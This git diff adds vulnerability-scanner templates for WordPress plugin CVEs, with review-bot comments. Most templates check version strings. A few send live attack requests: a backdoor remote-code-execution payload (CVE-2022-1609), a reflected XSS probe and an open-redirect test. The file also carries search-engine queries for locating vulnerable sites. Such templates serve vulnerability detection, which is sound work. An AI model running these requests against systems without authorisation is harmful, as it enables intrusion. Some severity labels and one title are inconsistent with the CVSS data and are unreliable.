diff --git a/poc/cve/CVE-2021-24510-5759.yaml b/poc/cve/CVE-2021-24510-5759.yaml
new file mode 100644
index 0000000000..a6edca5010
--- /dev/null
+++ b/poc/cve/CVE-2021-24510-5759.yaml
@@ -0,0 +1,48 @@
+id: CVE-2021-24510
+
+info:
+ name: MF Gig Calendar <= 1.1 - Reflected Cross-Site Scripting (XSS)
+ author: dhiyaneshDK
+ severity: medium
+ description: The MF Gig Calendar WordPress plugin through 1.1 does not sanitise or escape the id GET parameter before outputting back in the admin dashboard when editing an Event, leading to a reflected Cross-Site Scripting issue
+ reference:
+ - https://wpscan.com/vulnerability/715721b0-13a1-413a-864d-2380f38ecd39
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24510
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-24510
+ cwe-id: CWE-79
+ tags: wordpress,cve,cve2021,wp-plugin,authenticated
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ GET /wp-admin/admin.php?page=mf_gig_calendar&action=edit&id="><" HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ''
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
diff --git a/poc/cve/CVE-2021-24838-5769.yaml b/poc/cve/CVE-2021-24838-5769.yaml
new file mode 100644
index 0000000000..330119c99b
--- /dev/null
+++ b/poc/cve/CVE-2021-24838-5769.yaml
@@ -0,0 +1,32 @@
+id: CVE-2021-24838
+
+info:
+ name: AnyComment <= 0.2.21 - Open Redirect
+ author: noobexploiter
+ severity: medium
+ description: The plugin has an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated first, leading to an Open Redirect issue, which according to the vendor, is a feature.
+ reference:
+ - https://wpscan.com/vulnerability/562e81ad-7422-4437-a5b4-fcab9379db82
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24838
+ tags: wordpress,wp-plugin,open-redirect
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-24838
+ cwe-id: CWE-601
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://example.com"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: header
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+
+ - type: status
+ status:
+ - 302
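Review bot: The `tags` line (`wordpress,wp-plugin,open-redirect`) omits `cve` and `cve2021` although both `id` and `cve-id` are CVE-2021-24838, so a tag-based selection of CVE templates skips this one; `tags: cve,cve2021,wordpress,wp-plugin,open-redirect` would bring it in line with the other CVE-2021 templates in this commit. The `Location` regex is documented only by a regex101 link; a one-line comment stating what it accepts (roughly: an absolute, scheme-relative or backslash-prefixed URL whose host ends in `example.com`) would survive the link going stale.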
diff --git a/poc/cve/CVE-2022-1609(1).yaml b/poc/cve/CVE-2022-1609(1).yaml
new file mode 100644
index 0000000000..4e6b12b21f
--- /dev/null
+++ b/poc/cve/CVE-2022-1609(1).yaml
@@ -0,0 +1,51 @@
+id: CVE-2022-1609
+
+info:
+ name: The School Management < 9.9.7 - Remote Code Execution
+ author: For3stCo1d
+ severity: critical
+ description: The School Management plugin before version 9.9.7 contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site.
+ impact: |
+ Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
+ remediation: |
+ Upgrade The School Management to version 9.9.7 or later to mitigate this vulnerability.
+ reference:
+ - https://wpscan.com/vulnerability/e2d546c9-85b6-47a4-b951-781b9ae5d0f2
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1609
+ - https://github.com/nastar-id/WP-school-management-RCE
+ - https://github.com/nomi-sec/PoC-in-GitHub
+ - https://github.com/0x007f/cve-2022-1609-exploit
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-1609
+ cwe-id: CWE-94
+ epss-score: 0.11941
+ epss-percentile: 0.95204
+ cpe: cpe:2.3:a:weblizar:school_management:*:*:*:*:pro:wordpress:*:*
+ metadata:
+ verified: false
+ max-request: 1
+ vendor: weblizar
+ product: school_management
+ framework: wordpress
+ tags: cve,cve2022,rce,wp,backdoor,wpscan,wordpress
+variables:
+ cmd: "echo CVE-2022-1609 | rev"
+
+http:
+ - raw:
+ - |
+ POST /wp-json/am-member/license HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ blowfish=1&blowf=system('{{cmd}}');
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '9061-2202-EVC'
+# digest: 4a0a0047304502200872372405ed22355feb5563998d7f95436c514c160cfeccf01a8b2abd46b860022100be3d47033c621fc7e1bb884a38a475d6cea39dca8c02c8eddbc4cbcaeb933025:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
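Review bot: The only matcher is the body word `9061-2202-EVC`, so `matchers-condition: and` has nothing to combine and the finding rests on one string in a template marked `verified: false`. The reversed marker is a sound choice because the request body never contains it, but it appears only when `rev` exists on the target, so a vulnerable host without that binary is reported clean; a comment above `variables:` such as `# marker is produced by rev on the target; a missing binary gives a false negative` would record that limit. Because the request runs a command on the scanned host rather than fingerprinting it, adding a tag such as `intrusive` to `tags:` would let scan profiles exclude the template where command execution is out of scope. The file also ends without a newline after the `# digest:` line.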
diff --git a/poc/cve/CVE-2023-2416-b6e308449e56a72318f3547f11c5f544.yaml b/poc/cve/CVE-2023-2416-b6e308449e56a72318f3547f11c5f544.yaml
new file mode 100644
index 0000000000..5d9f66f32e
--- /dev/null
+++ b/poc/cve/CVE-2023-2416-b6e308449e56a72318f3547f11c5f544.yaml
@@ -0,0 +1,59 @@
+id: CVE-2023-2416-b6e308449e56a72318f3547f11c5f544
+
+info:
+ name: >
+ Online Booking & Scheduling Calendar for WordPress by vcita <= 4.5 - Cross-Site Request Forgery to Account Logout
+ author: topscoder
+ severity: medium
+ description: >
+ The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to Cross-Site Request Forgery due to a missing nonce check on the vcita_logout_callback function in versions up to, and including, 4.5. This makes it possible for unauthenticated to logout a vctia connected account which would cause a denial of service on the appointment scheduler, via a forged request granted they can trick a site user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f434585c-8533-4788-b0bc-5650390c29a8?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L
+ cvss-score: 5.4
+ cve-id: CVE-2023-2416
+ metadata:
+ fofa-query: "wp-content/plugins/meeting-scheduler-by-vcita/"
+ google-query: inurl:"/wp-content/plugins/meeting-scheduler-by-vcita/"
+ shodan-query: 'vuln:CVE-2023-2416'
+ tags: cve,wordpress,wp-plugin,meeting-scheduler-by-vcita,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/meeting-scheduler-by-vcita/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "meeting-scheduler-by-vcita"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.5')
\ No newline at end of file
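Review bot: The `dsl` matcher `compare_versions(version, '<= 4.5')` decides the finding from the `Stable tag` string in `readme.txt` alone, so a match shows that this version string is published, not that the missing nonce check on `vcita_logout_callback` was observed. A readme can lag behind or run ahead of the installed code, and a site that blocks `readme.txt` is reported clean, so results are better labelled as version-based; a comment above `matchers:` such as `# version-only check: reads Stable tag from readme.txt, does not exercise the vulnerable handler` would say so. The same construction is used in the CVE-2024-0680, CVE-2024-10056, CVE-2024-10178, CVE-2024-10247, CVE-2024-10320, CVE-2024-10516, CVE-2024-10578, CVE-2024-10681, CVE-2024-10689, CVE-2024-10692, CVE-2024-10777, CVE-2024-10836, CVE-2024-10848 and CVE-2024-10849 hunks, where the theme variants read `Version:` from `style.css` instead.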
diff --git a/poc/cve/CVE-2024-0680-0ba13fa9274659992e0f27178c53ade5.yaml b/poc/cve/CVE-2024-0680-0ba13fa9274659992e0f27178c53ade5.yaml
new file mode 100644
index 0000000000..3e70868ca5
--- /dev/null
+++ b/poc/cve/CVE-2024-0680-0ba13fa9274659992e0f27178c53ade5.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-0680-0ba13fa9274659992e0f27178c53ade5
+
+info:
+ name: >
+ WP Private Content Plus <= 3.6 - Protection Mechanism Bypass
+ author: topscoder
+ severity: medium
+ description: >
+ The WP Private Content Plus plugin for WordPress is vulnerable to information disclosure in all versions up to, and including, 3.6. This is due to the plugin not properly restricting access to posts via the REST API when a page has been made private. This makes it possible for unauthenticated attackers to view protected posts.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/43d8904f-3bc9-4c67-b44b-8d78762b6b30?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-0680
+ metadata:
+ fofa-query: "wp-content/plugins/wp-private-content-plus/"
+ google-query: inurl:"/wp-content/plugins/wp-private-content-plus/"
+ shodan-query: 'vuln:CVE-2024-0680'
+ tags: cve,wordpress,wp-plugin,wp-private-content-plus,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-private-content-plus/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-private-content-plus"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10056.yaml b/poc/cve/CVE-2024-10056.yaml
new file mode 100644
index 0000000000..f494085d76
--- /dev/null
+++ b/poc/cve/CVE-2024-10056.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10056
+
+info:
+ name: >
+ Contact Form Builder <= 4.10.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via livesite-pay Shortcode
+ author: topscoder
+ severity: low
+ description: >
+ The Contact Form Builder by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's livesite-pay shortcode in all versions up to, and including, 4.10.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5d1b419c-2276-415d-8c54-15da9125c442?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-10056
+ metadata:
+ fofa-query: "wp-content/plugins/contact-form-with-a-meeting-scheduler-by-vcita/"
+ google-query: inurl:"/wp-content/plugins/contact-form-with-a-meeting-scheduler-by-vcita/"
+ shodan-query: 'vuln:CVE-2024-10056'
+ tags: cve,wordpress,wp-plugin,contact-form-with-a-meeting-scheduler-by-vcita,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/contact-form-with-a-meeting-scheduler-by-vcita/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "contact-form-with-a-meeting-scheduler-by-vcita"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.10.4')
\ No newline at end of file
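Review bot: `severity: low` and the `low` entry in `tags:` disagree with `cvss-score: 6.4` in `classification`, which falls in the CVSS v3.1 medium band (4.0–6.9), so a scan filtered on severity would drop a finding that the score rates higher. Either align the field, `severity: medium` with the tag changed to match, or add a comment that the downgrade is deliberate because the issue needs contributor access. The same gap appears in the CVE-2024-10178, CVE-2024-10320, CVE-2024-10681, CVE-2024-10689, CVE-2024-10692, CVE-2024-10777, CVE-2024-10848 and CVE-2024-10849 hunks (low against scores from 4.3 to 6.4), in CVE-2024-10247 and CVE-2024-10578 (low against 7.2 and 8.8), and in the other direction in CVE-2024-10516 (`severity: critical` against 8.1).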
diff --git a/poc/cve/CVE-2024-10178.yaml b/poc/cve/CVE-2024-10178.yaml
new file mode 100644
index 0000000000..ee98d1b80a
--- /dev/null
+++ b/poc/cve/CVE-2024-10178.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10178
+
+info:
+ name: >
+ Gutentor – Gutenberg Blocks – Page Builder for Gutenberg Editor <= 3.3.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via Countdown Widget
+ author: topscoder
+ severity: low
+ description: >
+ The Gutentor – Gutenberg Blocks – Page Builder for Gutenberg Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Countdown widget in all versions up to, and including, 3.3.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/17ecebfd-b07f-415f-892f-e069ab84031a?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-10178
+ metadata:
+ fofa-query: "wp-content/plugins/gutentor/"
+ google-query: inurl:"/wp-content/plugins/gutentor/"
+ shodan-query: 'vuln:CVE-2024-10178'
+ tags: cve,wordpress,wp-plugin,gutentor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/gutentor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "gutentor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.3.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10247-7e9248f7d08a8c804a85ce87492c023b.yaml b/poc/cve/CVE-2024-10247-7e9248f7d08a8c804a85ce87492c023b.yaml
new file mode 100644
index 0000000000..ff987679f5
--- /dev/null
+++ b/poc/cve/CVE-2024-10247-7e9248f7d08a8c804a85ce87492c023b.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10247-7e9248f7d08a8c804a85ce87492c023b
+
+info:
+ name: >
+ YouTube Gallery and Vimeo Gallery Plugin <= 2.4.2 - Authenticated (Administrator+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+ The Video Gallery – Best WordPress YouTube Gallery Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the orderby parameter in all versions up to, and including, 2.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f5524582-5aac-48b4-ad67-7c4829d63ed0?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.2
+ cve-id: CVE-2024-10247
+ metadata:
+ fofa-query: "wp-content/plugins/gallery-videos/"
+ google-query: inurl:"/wp-content/plugins/gallery-videos/"
+ shodan-query: 'vuln:CVE-2024-10247'
+ tags: cve,wordpress,wp-plugin,gallery-videos,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/gallery-videos/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "gallery-videos"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.4.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10320-f49b48a1fa24c03d49f1d0779bc05074.yaml b/poc/cve/CVE-2024-10320-f49b48a1fa24c03d49f1d0779bc05074.yaml
new file mode 100644
index 0000000000..a72c85cd6b
--- /dev/null
+++ b/poc/cve/CVE-2024-10320-f49b48a1fa24c03d49f1d0779bc05074.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10320-f49b48a1fa24c03d49f1d0779bc05074
+
+info:
+ name: >
+ Cookielay <= 1.2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via cookielay Shortcode
+ author: topscoder
+ severity: low
+ description: >
+ The Cookielay plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's cookielay shortcode in all versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8e014aa5-4fdf-458b-a975-e3ced7186dc2?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-10320
+ metadata:
+ fofa-query: "wp-content/plugins/cookielay/"
+ google-query: inurl:"/wp-content/plugins/cookielay/"
+ shodan-query: 'vuln:CVE-2024-10320'
+ tags: cve,wordpress,wp-plugin,cookielay,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cookielay/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cookielay"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10516-90da3b799283fae5783fef07a67bdeef.yaml b/poc/cve/CVE-2024-10516-90da3b799283fae5783fef07a67bdeef.yaml
new file mode 100644
index 0000000000..30a8c6df13
--- /dev/null
+++ b/poc/cve/CVE-2024-10516-90da3b799283fae5783fef07a67bdeef.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10516-90da3b799283fae5783fef07a67bdeef
+
+info:
+ name: >
+ Swift Performance Lite <= 2.3.7.1 - Unauthenticated Local PHP File Inclusion via 'ajaxify'
+ author: topscoder
+ severity: critical
+ description: >
+ The Swift Performance Lite plugin for WordPress is vulnerable to Local PHP File Inclusion in all versions up to, and including, 2.3.7.1 via the 'ajaxify' function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4921f41a-a9b1-4ae2-a903-c14ed22dcc15?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.1
+ cve-id: CVE-2024-10516
+ metadata:
+ fofa-query: "wp-content/plugins/swift-performance-lite/"
+ google-query: inurl:"/wp-content/plugins/swift-performance-lite/"
+ shodan-query: 'vuln:CVE-2024-10516'
+ tags: cve,wordpress,wp-plugin,swift-performance-lite,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/swift-performance-lite/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "swift-performance-lite"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.3.7.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10578-6bc0121b7a6d48f214b8939cb1f78d29.yaml b/poc/cve/CVE-2024-10578-6bc0121b7a6d48f214b8939cb1f78d29.yaml
new file mode 100644
index 0000000000..1491e63422
--- /dev/null
+++ b/poc/cve/CVE-2024-10578-6bc0121b7a6d48f214b8939cb1f78d29.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10578-6bc0121b7a6d48f214b8939cb1f78d29
+
+info:
+ name: >
+ Pubnews <= 1.0.7 - Unauthenticated Arbitrary Plugin Installation
+ author: topscoder
+ severity: low
+ description: >
+ The Pubnews theme for WordPress is vulnerable to unauthorized arbitrary plugin installation due to a missing capability check on the pubnews_importer_plugin_action_for_notice() function in all versions up to, and including, 1.0.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install arbitrary plugins that can be leveraged to exploit other vulnerabilities.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7eaa0117-5320-431f-b3d2-05a867901528?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-10578
+ metadata:
+ fofa-query: "wp-content/themes/pubnews/"
+ google-query: inurl:"/wp-content/themes/pubnews/"
+ shodan-query: 'vuln:CVE-2024-10578'
+ tags: cve,wordpress,wp-theme,pubnews,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/pubnews/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "pubnews"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.7')
\ No newline at end of file
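Review bot: The `name` reads "Unauthenticated Arbitrary Plugin Installation", but the `description` says the attacker is authenticated with Subscriber-level access and the vector in `cvss-metrics` carries `PR:L`, so the title overstates the exposure. A title that matches the description, for example `Pubnews <= 1.0.7 - Authenticated (Subscriber+) Arbitrary Plugin Installation`, would follow the naming the other templates in this commit use. Anyone triaging by title alone would otherwise treat this as reachable without an account.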
diff --git a/poc/cve/CVE-2024-10681-074ccd2e143d120107ec916d21cfe73a.yaml b/poc/cve/CVE-2024-10681-074ccd2e143d120107ec916d21cfe73a.yaml
new file mode 100644
index 0000000000..5c42b94e4a
--- /dev/null
+++ b/poc/cve/CVE-2024-10681-074ccd2e143d120107ec916d21cfe73a.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10681-074ccd2e143d120107ec916d21cfe73a
+
+info:
+ name: >
+ ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup <= 4.0.51 - Authenticated (Subscriber+) Arbitrary Shortcode Execution
+ author: topscoder
+ severity: low
+ description: >
+ The The ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 4.0.51. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with subscriber-level access and above, to execute arbitrary shortcodes.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ee0eead2-3eab-4a2a-bfe4-c0d8f91dc0a5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
+ cvss-score: 6.3
+ cve-id: CVE-2024-10681
+ metadata:
+ fofa-query: "wp-content/plugins/armember-membership/"
+ google-query: inurl:"/wp-content/plugins/armember-membership/"
+ shodan-query: 'vuln:CVE-2024-10681'
+ tags: cve,wordpress,wp-plugin,armember-membership,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/armember-membership/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "armember-membership"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.0.51')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10689-ec644bcff6b8252f58e7ce0b4795467c.yaml b/poc/cve/CVE-2024-10689-ec644bcff6b8252f58e7ce0b4795467c.yaml
new file mode 100644
index 0000000000..4c56e5a5b1
--- /dev/null
+++ b/poc/cve/CVE-2024-10689-ec644bcff6b8252f58e7ce0b4795467c.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10689-ec644bcff6b8252f58e7ce0b4795467c
+
+info:
+ name: >
+ XLTab – Accordions and Tabs for Elementor Page Builder <= 1.4 - Authenticated (Contributor+) Post Disclosure
+ author: topscoder
+ severity: low
+ description: >
+ The XLTab – Accordions and Tabs for Elementor Page Builder plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.4 via the 'XLTAB_INSERT_TPL' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/dbf8c216-aedd-4db9-aaa4-61bc0d7850cb?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-10689
+ metadata:
+ fofa-query: "wp-content/plugins/xl-tab/"
+ google-query: inurl:"/wp-content/plugins/xl-tab/"
+ shodan-query: 'vuln:CVE-2024-10689'
+ tags: cve,wordpress,wp-plugin,xl-tab,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/xl-tab/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "xl-tab"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4')
\ No newline at end of file
